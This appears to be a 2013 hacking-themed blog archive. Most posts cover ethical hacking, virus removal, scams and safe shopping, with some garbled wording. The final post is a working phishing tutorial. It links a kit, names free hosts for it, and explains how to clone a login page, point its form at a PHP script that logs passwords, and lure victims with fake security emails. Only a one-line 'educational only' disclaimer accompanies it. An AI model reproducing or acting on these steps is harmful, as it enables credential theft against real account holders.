Sunday, June 30, 2013

Working of an Ethical Hacker...





Working of an ethical hacker

Obeying the ethical hacking commandments:
Every ethical hacker must follow few basic principles. If he do not follow, bad things can happen. Most of the time these principles get ignored or forgotten when planning or executing ethical hacking tests. The results are even very dangerous.

Working ethically:
The word ethical can be defined as working with high professional morals and principles. Whether you’re performing ethical hacking tests against your own systems or for someone who has hired you, everything you do as an ethical hacker must be approved and must support the company’s goals. No hidden agendas are allowed! Trustworthiness is the ultimate objective. The misuse of information is absolutely not allowed. That’s what the bad guys do.

Respecting privacy:
Treat the information you gather with complete respect. All information you obtain during your testing-from web application log files to clear-text passwords-must be kept private

Not crashing your systems:
One of the biggest mistakes is when people try to hack their own systems; they come up with crashing their systems. The main reason for this is poor planning. These testers have not read the documentation or misunderstand the usage and power of the security tools and techniques.
You can easily create miserable conditions on your systems when testing. Running too many tests too quickly on a system causes many system lockups. Many security assessment tools can control how many tests are performed on a system at the same time. These tools are especially handy if you need to run the tests on production systems during regular business hours.

Executing the plan:
In ethical hacking, time and patience are important. Be careful when you’re performing your ethical hacking tests. A hacker in your network or an employee looking over your shoulder may watch what’s going on. This person could use this information against you. It’s not practical to make sure that no hackers are on your systems before you start. Just make sure you keep everything as quiet and private as possible.
This is especially critical when transmitting and storing your test results. You’re now on a reconnaissance mission. Find as much information as possible about your organization and systems, which is what malicious hackers do. Start with a broad view of mind and narrow your focus. Search the internet for your organization’s name, your computer and network system names, and your IP address. Google is a great place to start for this
Don’t take ethical hacking too far, though. It makes little sense to harden your system from unlikely attacks. For instance, if you don’t have a internal web server running, you may not have to worry too much about. However, don’t forget about insider threats from malicious employees or your friend or colleagues!

“Never share your password with anyone even with your boyfriends or girlfriends”.
Posted by at No comments:

HOW TO REMOVE NEW FOLDER VIRUS...





HOW TO REMOVE NEW FOLDER VIRUS

What is newfolder.exe?
The real name of this virus is Iddono. This threat copies its files to your hard disk. Its typical file name is Iddono. Then it creator new startup key with name Iddono and value new folder.exe. You can also find it in your processes list with name newfolder.exe or Iddono . This virus is very difficult to eliminate manually, but you can find several possible methods of removal below
How to fix netfolder.exe:
Quick solution:
True sword will find an eliminate this problem and more than 447 908 other dangerous threats including Trojans, spyware ,adware , risk ware, problem ware, key loggers, dialers and other kinds of malicious programs in several seconds fast , easy , and handy, true   sword protects your computer against malicious  programs that do harm to your computer and break your privacy. True sword scans your hard disks and registry and destroys any manifestation of such malicious programs like that. Get rid of Trojans, spyware, adware, track ware, dialers and key loggers in one click
How to fix newfolder.exe manually for advanced user only
This problem can be solved manually by deleting all registry keys and files connected with this software removing it from startup list and unregistering all corresponding DLLS. Additionally missing DLL’S should be restored from distribution in case they are corrupted by iddono. To fix this threat, you should: 1 .Kill the following processes and delete the appropriate files:
Ø  Libedit.Dill
Ø  Newfolder.exe
Ø  Shelliddono.Dill
Ø  Srv0104.ids
Ø  Srvidd20.exe

If these files can’t be deleted during normal windows work or recreate themselves, reboot into safe mode and repeat deletion. if you do not see all of these files ,then they are hiding themselves you need special software to kill those hidden files . 2. Delete the following malicious registry entries and\or values
Ø  Key : SOFTWARE\Microsoft\windows\current version\run for nwiz.exe value: @
Ø  Key : software\Microsoft\windows\Current version\run\alchem value:@
Ø  Key : software\Microsoft\windows\current version\run\zzb value : @



Another method which is recently discovered by me that any AVG antivirus above 8.0 version can detect the new folder virus easily
Posted by at No comments:

Saturday, June 29, 2013

Steps performed by hackers...





Steps Performed by Hackers

1.       Reconnaissance
2.       Scanning
3.       Gaining access
4.       Maintaining access
5.       Clearing tracks

·         Performing reconnaissance
·         Scanning and enumeration
·         Gaining access
·         Maintain access and placing back doors
·         Covering tracks or clearing logs




 Phase 1: reconnaissance

Ø  Reconnaissance can be described as the pre-attack phase and is a systematic attempt to locate, gather, identify, and record information about the target. The hacker seeks to find out as much information as possible about the target.
Phase 2: scanning and enumeration

Scanning and enumeration is considered the second pre-attack phase. This phase and is a systematic attempt to locate, gather, identify, and record information about the hacker seeks to find out as much information as possible about the target

Phase 3: gaining access

This is the phase where the real hacking takes place. Vulnerabilities discovered during the reconnaissance and scanning phase are now exploited to gain access. The method of connection the hacker uses for an exploit can be a local area network, local access to a PC, the internet, or offline. Gaining access is known in the hacker world as owning the systems. During real security breach it would be this stage where the hacker can utilize simple techniques to cause irreparable damage to the target system.

Phase 4: maintaining access and placing backdoors

Once a hacker has gained access, they want to keep that access for future exploitation and attacks. Sometimes, hackers harden the system from other hackers or security personnel by securing their exclusive access with backdoors, root kits, and Trojans.

The attacker can use automated scripts and automated tools for hiding attack evidence and also to create backdoors for further attack

Phase 5: clearing tracks

In this phase, once hackers have been able to gain and maintain access, they cover their tracks to avoid detection by security personnel, to continue to use the owned system, to remove evidence of hacking, or to avoid legal action. At present, many successful security breaches are made but never detected. This includes cases where firewalls and vigilant log checking were in place.

Posted by at No comments:

Why Hackers Hack






Why Hackers Hack ?....


Ø  The main reason why hackers hack is because they can hack. Hacking is a casual hobby for some hackers-they just hack to see what they can hack and what they can’t hack, usually by testing their own systems. Many hackers are the guys who get kicked out of corporate and government IT and security organizations. They try to bring down the status of the organization by attacking or stealing information.
Ø  The knowledge that malicious hacker’s gain and the ego that comes with that knowledge is like an addition. Some hackers want to make your life miserable, and others simply want to be famous. Some common motives of malicious hackers are revenge, curiosity, boredom, challenge, theft for financial gain, blackmail, extortion, and corporate work pressure.
Ø  Many hackers say they do not hack to harm or profit through their bad activities, which helps them justify their work. They often do not look for money full of pocket. Just proving a point is often a good enough reward for them.



Prevention from Hackers:

Ø  What can be done to prevent hackers from finding new holes in software and exploiting them?
Ø  Information security research teams’ exist-to try to find these holes and notify vendors before they are exploited. There is a beneficial competitions occurring between the hackers securing systems and the hackers securing systems and the hackers breaking into those systems. This competition provides us with better and stronger security, as well as more complex and sophisticated attack techniques.
Ø  Defending hackers create detentions systems to track attacking hackers, while the attacking hackers develop by passing techniques, which are eventually resulted in bigger and better detecting and tracking systems. The net result of this interaction is positive, as it produces smarter people, improved security, more stable software, inventive problem-solving techniques, and even a new economy.
Ø  Now when you need protection from hackers, whom you want to call, “The Ethical Hackers”. An ethical hacker possesses the skills, mindset, and tools of a hacker but is also trustworthy. Ethical hackers perform the hacks as security tests computer system.
Ø  Ethical hacking-also known as penetration testing or white-hat hacking-involves the same tools, tricks and techniques that hackers use, but with one major differences:
Ø  Ethical hacking is legal.
Ø  Ethical hacking is performed with the target’s permission. The internet of ethical hacking is to discover vulnerabilities from hacker’s view point so systems can be better secured. Ethical hacking is part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also ensure that vendor’s claim about the security of their products are legitimate.
Ø  As hackers expand their knowledge, so should you must think like them to protect your systems from them. You, as the ethical hacker, must know activities hackers carry out and how to stop their efforts. You should know what to look for and how to use that information to the wart hacker’s efforts.
Ø  You don’t have to protect your systems from everything. You can’t.
Ø  The only protection against everything is to unplug your computer systems and lock them away so no one can touch them-not even you.
Ø  That’s not the best approach to information security. What’s important is to protect your systems from known vulnerabilities and common hacker attacks

Ø  It’s impossible to overcome all possible vulnerabilities of your systems. You can’t plan for all possible attacks-especially the ones that are currently unknown which are called zero day exploits. These are the attacks which are not known to the world. However in ethical hacking, the more combinations you try –the more you test whole systems instead of individual unit –the better your chances of discovering vulnerabilities
Posted by at No comments:

Types of Hacker





Let’s see the categories of hackers on the basis on their knowledge.

Coders:
Ø  The real hackers are the coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses in software to create their own exploits.
               These hackers can use those exploits to develop fully patched and secure systems
Ø  Coders are the programmers who have the ability to find the unique vulnerability in existing software and to create working exploit codes. These are the individuals with a deep understanding of the OSI layer model and TCP/IP stacks.

Admins:
Ø  Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques, however they uses the tricks which are already prepared by the coders. They are generally system administration, or computer network controller. Most of the hackers and security person in this digital world come under this category

Ø  Admins have experience with several operating systems, and know how to exploit several existing vulnerabilities. A majority of security consultants fall in this group and work as a part of security team

Script kiddies:

Ø  Next and the most dangerous class of hackers is scripts kiddies, they are the new generations of users of computer who take advantage of the hacker tools and documentation available for free on the internet but don’t  have any knowledge of what’s going on behind the scenes. They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even though these guys  are the teenage hackers that you hear about in the news media, they need minimum skills to carry out their attacks
Ø  Script kiddies are the bunnies who use script and programs developed by others to attack computer systems and networks. They get the least respect but are most annoying and dangerous and can cause big problems without actually knowing what they are doing.


Types of hackers on the basis of activities performed by them

White hat hacker:

Ø  A while hat hacker is computer guy who perform ethical hacking. These are usually security professionals with knowledge of hacking and the hacker toolset and who use this knowledge to locate security weakness and implement counter measures in the resources.

Ø  They are also known as an ethical hacker or a penetration tester. They focus on securing and protecting IT systems.

Black hat hacker:

Ø  A black hacker is computer guy who performs unethical hacking. These are the criminal hackers or crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines, with malicious intent.

Ø  These are also known as an unethical hacker or a security cracker. They focus on security cracking and data stealing.

Grey hat hacker:

Ø  A grey hat hacker is a computer guy who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may not occasionally commit crimes during the course of their technological exploits.


Ø  They are hybrid between white hat and black hat hackers.
Posted by at No comments:

Concept of Ethical Hacking...



        1.    HACKING:

Ø  The Art of exploring various security breaches is termed as Hacking
Ø  Computers Hackers have been around for so many years. Since the internet became widely used in the world, we have started to hear more and more about Hacking. Only a few Hackers, such as Kevin Mitnick, are well known
Ø  In a world of black and white, it’s easy to describe the typical Hacker. A general outline of a typical Hacker is an Antisocial, pimple-faced teenage boy. But the digital world has many types of Hackers
Ø  Hackers are human likes the rest of us and are, therefore, unique individuals, so an exact profile is hard to outline. The best board description of Hackers is that all Hackers aren’t equal. Each Hacker has motives, methods and skills. But some general characteristics can help you understand them. Not all Hackers are Antisocial, pimple-faced Teenagers. Regardless, Hackers are curious about knowing new things, brave to take steps and they are often very sharp minded

2.    Hacker:

Ø  Hacker is a word that has two meanings
Ø  Traditionally, a Hacker is someone who likes to play with software or electronic systems. Hackers enjoy exploring and learning how computer systems operate. They love discovering new way to work electronically.
Ø  Recently, Hacker has taken on a new meaning-someone who maliciously breaks into systems for personal gain. Technically, these criminals are crackers as criminal Hackers. Crackers break into systems with malicious intentions.
Ø  They do it for personal gain, fame, profit and even revenge. They modify, delete and steal critical information, often making other people’s life miserable
Ø  Hacking has a lot of meanings depending upon the person’s life miserable
Ø  Hacking has a lot of meanings depending upon the person’s knowledge and his work intentions. Hacking is an art as well as a skill. Hacking is the knowledge by which one gets to achieve his goals, anyhow, using his skills and power.
Ø  Most people associate Hacking with breaking law, therefore calling all those guys who engage in hacking activities to be criminals. We agree that there are people out there who use hacking techniques to break the law, but hacking is not really about that. In fact, hacking is more about following the law and performing the steps within the limits.

         3.    Ethical Hacking

Ø  Ethical Hacking is testing the resources for a good cause and for the betterment of technology. Technically ethical Hacking means penetration testing which is focused on securing and protecting IT systems

          4.    Hactivism:
Ø Another type of hackers are Hactivists, who try to broadcast political or social message through their work. A Hacktivist wants to raise public awareness of an issue. Examples of hacktivism are the web sites that were defaced with the jihad messages in the name of terrorism

        5.    Cyber terrorist:

    Ø  There are hackers who are called cyber terrorists, who attack government computers 
or public    utility infrastructures, such as power stations and air-traffic-control towers. They crash critical systems or steal classified government information. While in a conflict with enemy countries some government start cyber war via internet

        6.       Hacker vs. cracker:

What is the difference between a hacker and a cracker?

Ø  Many articles have been written about the difference between hacker and cracker, which attempt to correct public misconceptions about hacking. For many years, media has applied has word hacker when it really means cracker. So the public now believe that a hacker is someone who breaks into computer systems and steal confidential data. This is very untrue and is an insult to some of our most talented hackers.

There are various points to determine the difference between Hacker and Cracker?

Ø  Definition- a hacker is a person who is interested in the working of any computer operating system. Most often, hackers are programmers. Hackers obtain advanced knowledge of operating system and programming languages. They may know various security holes within systems and the reasons for such holes. Hackers constantly seek further knowledge, share what they have discovered, and they never have intentions about damaging or stealing data.
Ø  Definition: A cracker is a person who breaks into other people system, with malicious intentions. Crackers gain unauthorized access, destroy important data, stop services provided by the server, or basically cause problems for their targets. Crackers can easily be identified because their actions are malicious

Ø  Whatever the case, most people give hacker a negative outline. Many malicious hackers are electronic thieves. Just like anyone can become a thief, or a robber, anyone can become a hacker, regardless of age, gender, or religion. Technical skills of hackers vary from one to another. Some hackers barely know how to surf the internet whereas others write software that other hackers depend upon.
Posted by at No comments:

Friday, June 28, 2013

How a ‘Denial of service’ Attack works...



On February 6th, 2000 yahoo portal was shut down for 3 hours. Then retailer Buy. Com Inc. (BUYX) was hit the next day, hours after going public by that evening, eBay (EBAY), amazon.com (AMZN) ,and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E* trade (EGRP) and others having traffic to their sites virtually chocked off.
How a denial of service attack works
I n a typical connection, the user sends a message asking the server to authenticate it. The server returns the authentication approval to the user. The user acknowledges this approval and then is allowed on to the server in a denial of service attack, the user sends several authentication requests to the server, filling it up. All requests have false return address so the server can’t find the user when it tries to send the authentication approval. The server wants, sometimes more than a minute, before closing the connections. When it does close the connection, the attacker sends a new batch of forged request, and the process begins again- typing up the service indefinitely
TYPICAL CONNECTION:
                                          


HOW TO BLOCK A DENIAL OF SERVICE ATTACK
One of the more common methods of blocking a denial of service attack is to set up a filter, or “sniffer” on a network before a stream of information reaches a sites web servers. The filter can

 Look for attacks by noticing patterns or identifiers contained in the information.  If a pattern comes in frequently, the filter can be instructed to block massages containing that pattern comes in frequently; the filter can be instructed to block messages containing that pattern, protecting the web servers from having their lines tied up.
Posted by at No comments:

12 tips to maintain a virus free pc



1.       Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has its origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than Gmail, yahoo, hotmail etc.) then it is highly recommended that you use good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
2.       Be careful about using MS Outlook. Outlook is more susceptible to worms than other email programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web –based program such as Hotmail or yahoo (in Fire fox).
3.       Never open any email attachments that come from untrusted sources. If it is picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tiff, .mp3, .htm, .html, and.avi), you are probably safe, but still do a scan before opening.
4.       As we all know, internet is the mail source of all the malicious programs including viruses, worms, Trojans etc. In fact internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.

·         Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead internet users and you should never trust them.
·         You can also use a pop-up blocker to automatically block those pop-ups.



                                                                                                                                                                          
5.       USB thumb/pen drives are another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.
6.       Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious website, you can download and install the AVG link scanner which is a freeware. This tool can become very handy and will help you stay away from malicious websites
7.       Install  a good Antispyware program that operates against internet malware and spy ware
8.       Install good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your pc from viruses. If pc security is your option then it is recommended that you go for shareware antivirus software over the free ones. Most of the antivirus support the auto-protect feature that provides real-time security for your pc. Make that this feature is turned on
9.       Do not use disks that other people gave you , even from work. The disk could be infected with a virus. Of  course ,you can run a virus scan on it first to check it out
10.   Set up your windows update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and internet explorer. These updates fix security holes in both pieces of software+
11.   While you download files from untrusted  websites/sources such as torrents, ware etc make sure that you run a virus scan before executing them
12.   And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials ware z etc since they contribute much in spreading of viruses and other malicious programs
Posted by at No comments:

Thursday, June 27, 2013

BEWARE OF COMMON INTERNET SCAM & FRAUDS...





The term internet scam internet fraud refers to any type of fraud scheme that user one or more online service to conduct fraudulent activities. Internet fraud can take place on computer programs such as
 Chat rooms, email, message boards or websites in this post I will discuss about some of the commonly conducted scams and frauds across the internet
1. Phishing scam
This is one of the most commonly used to scam to steal bank login and other types of passwords on the internet. Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trust worthy entity in an electronic communication. Phishing is typically carried out by e-mail or instant messaging
EXAMPLE: You may receive an email which claims to have from your bank /financial institution/online service provider that asks you to click a link and update your account information. When you click such a link it will take you to a fake page which exactly resembles the original ones here you’ll be asked to enter your personal details such as user name and passwords. Ones you enter your personal details they will be stolen away. Such an email is more than likely the type of internet scam known as phishing. Phishing is said to be highly effective and has proved to have more success rate since most of the common people fail to identify the scam
Most legitimate companies never request any kind of personal/sensitive information via email. So It is highly recommended that you do not respond to such fraudulent emails for more information on phishing visit my detailed post what is phishing?
2. Nigerian scams
This type of scam involves sending emails (spam) to people in bulk seeking their help to access large amount of money that is held up in a foreign bank account. This email claims that in return for the help you’ll be rewarded a percentage of the found that involves in the transaction never respond to these emails since it’s none other than a scam
In case if you respond to these emails you will be asked to deposit a small account  of money (say 1-2% of the whole fund ) as an insurance or as an advanced payment for the initialization of deal. However ones you deposit the amount to the scammers account you’ll not get any further response from them and you lose your money in fact “The large amount of money “never exists and the whole story is a trap for innocent people who are likely to become victims the scammers use a variety of stories to explain why they need your help to access the funds. The following are some of the example of them
EXAMPLES:
Ø  They may claim that political climate or legal issues preclude them from accessing funds in a foreign bank account
Ø  They may claim that the person is a minor and hence need your help to access the funds
Ø  They may claim that your last name is the same as that of the  deceased person who owned  the account and suggest that you act as the next of this person in order to gain access to the funds




 3. Lottery scams
This type of scam is similar to the one discussed above. In this type you may receive an email saying that you have won a large sum of money in on line lottery scheme (ex.UK lottery) even though you have not participated in any such schemes the message claims that your email ID was selected randomly from a large pool of ID’S when you respond to such emails they initially ask for your complete name and address so that they can mail the cheque across to you. After getting those details they may also send you an image of the cheque drawn in your name and address so as to confirm the deal. But in order to mail this cheque they demand a small amount of money as insurance/shipping charge/tax in return. However if you send the amount in hope to receive the cheque all you get is nothing.  You’re just trapped in a wonderful scam

4. Other general scams and frauds
          The following are some of the other types of scams that you should be aware of
In general, be aware of unsolicited emails that:
1.       Promise you money , jobs or prizes
2.       Ask you to provide sensitive personal information
3.       Ask you to follow a link to a website and log on to an account
4.       Propose lucrative business deals

However it may seem to be a difficult task for novice internet users to identify such online scams. Here are some of the common signs of such scam emails. By knowing them it may help you to say away
Ø  All these scam emails never address you by your name. in turn they commonly address you something like “dear user “ or “dear customer” etc. this is a clear indication that the email is a fraudulent one
Ø  When you observe the email header you may notice in the “To” field that, the same email is forwarded to a large group of people or the “To” field appears blank. So this confirms that
The email was not intended particularly for you. It was forwarded for a large group of people and you are one among them


Posted by at No comments:

12 Security Tips For Online Shopping...




The internet is an existing place to shop from the comfort of your own armchair you can browse for literally anything from a new camera to a holiday or flight you are not restricted to the stores in your local town, or even country and you can pick up deals at great prices on a whole range of products
Shopping online isn’t just as safe as handing over your  credit card in a store or restaurant however if you take care of few things it can be a safe deal following are the things you should take care of :
1.       Never respond to an email request for credit details all reputable companies will conduct transactions with you over a secure website connection
2.       Remember to never respond to any email advertisement and only visit sites you know or have book marked and verify the address before browsing further
3.       Only buy from trusted brands and websites
4.       To ensure that you only do business with legitimate companies check to see if they have a contact number an actual retail store and a printed catalogue to browse
5.       Check a website’s returns and privacy policy before going ahead with a purchase
6.       Check that you are entering your details through a secure payment connection you should notice when you click through to the transaction page of company’s website that the URL in the address bar begins  https:// (instead of the normal http://). This is the standard encrypted communication mechanism on the internet  and means that your credit card details are being sent securely
7.       Beware of deals that seem too good to be true
8.       Beware of limitations of the internet.  The internet may not best place to buy clothes or other products you need to see, touch or try on
9.       All reputable websites use secure payment systems. These are either a company’s own system or a 3rd party system such as world pay or pay pal
10.   When conducting a transaction over the internet, look for the yellow padlock in the grey status bar at the bottom of your browser page. This is an indication that the transaction is being conducted over a secure connection
11.   As an extra precaution check to see if there’s a gold lock at the bottom of the right hand corner of the browser if they don’t include any of these reliable indicators ,you might want to think twice before handing over your credit card number

12.   To be on the safe side, and avoid internet fraudsters, it’s also a good idea to install and use security software such as kaspersky internet security. it can provide you with industry leading security services that will provide you more protection against the  latest threats
Posted by at No comments:

Wednesday, June 26, 2013

WHAT IS PHISHING ?......

What is Phishing:



The act of sending email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft
The Email directs the user to visit a web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers that the legitimate organization already has. The web site, however, is bogus and set up only to steal the user’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing scams Could Be
Ø  Emails inviting you to join a social group ,asking you to login using your username and password
Ø  Email saying that your bank account is locked and sign in to your account to unlock it
Ø  Emails containing some information of your interest and asking you to login to your account
Ø  Any Email carrying link to click and asking you to login

The Phishing Hack Starts Now. This Hack example is for orkut account.
Step 1 : download the necessary files which you will need during the phishing attack .This file is a .rar file which includes 3 files named hackingtech .php, hackingtech.txt & Service Login .html and also consist a folder in which there are support files for ServerLogin.html
“You can Download the pack From Here: http://www.hackingtech.co.tv/orkuthacking.rar”.
Step 2: Unrar the download pack named orkuthacking.rar  anywhere on your computer.
Step 3: Upload the folder “ServiceLogin-files” and 2 of the files->> “hackingtech.php” and “hackingtech.txt” in any web hosting site…
You will have to create a sub folder in the web hosting site’s directory. Name that folder as “ServiceLogin-files” and upload the 2 images of the pack in that folder. (it must supports PHPs.)
>>> You can choose one of the following web hosting company to upload the folder.
http://www.freeweb7.com
http://Ripway.com{Recommended}
http://www.110mb.com
http://www.phpnet.us
http://:www.t35.com
http://:007ihost.com

Step 4: your work is over now just give the link ofurfake page to the victim and whenever he/she will type the password and sign in .password will be stored in “hackingtech.txt”…..
General form of the fake page’s link
Code:
http://urwebhostingsite/urusername/servicelogin.htm
Step 5: Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkut the your orkut account has a security problem pl. click on the link below and re-activate your account . we will see how to send fake email within short time
Now if you want to create your own phishing page the follow the steps below
Step 1: Open the website whose phishing page you want create.
Step 2: Then right click anywhere on the page and select view source.
Step 3: Press (Ctrl + A) and the code will be selected and then press (Ctrl + c) to copy the code.
Step 4: Then paste this code in a new notepad window and save it as ServerLogin.htm
Step 5: Open “ServerLogin.htm” with notepad and the search for word “action”. [Press Ctrl + f to find the word]
Step 6: You will find like this action =”https://www.google.com/accounts/serviceloginAuth
Step 7: Replace the link between this red quotes with the link you got by uploading the file hackingtech.php and it should be like this action = “http://www.yourhostingcompany,com/username/hackingtech.php
Step 8: Now Save this as serverlogin.htm
Step 9: Now upload the folder “ServiceLogin_files” and 2 of the files ->> “hackingtech.php” and “hackingtech.txt” and serverlogin.htm file in any web hosting site you want.
Step 10: You are done just go to the link of the file serverlogin.htm given by your hosting company.
Step 11: Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkut the your orkut account has a security problem pl. click on the link below and re –activate your account .We will see how to send fake email within short time.
Step 12: To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company.
Prevention against phishing

Ø  Read all the Email Carefully and Check if the Sender is Original.
Ø  Watch the Link Carefully before Clicking
Ø  Always check the URL in the Browser before Signing IN to your Account
Ø  Always login to your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email.


“Do not use this hack trick in any criminal activities like phishing bank websites and please do not destroy any ones account this is only foe educational purpose”.  
Posted by at No comments:
Subscribe to: Comments (Atom)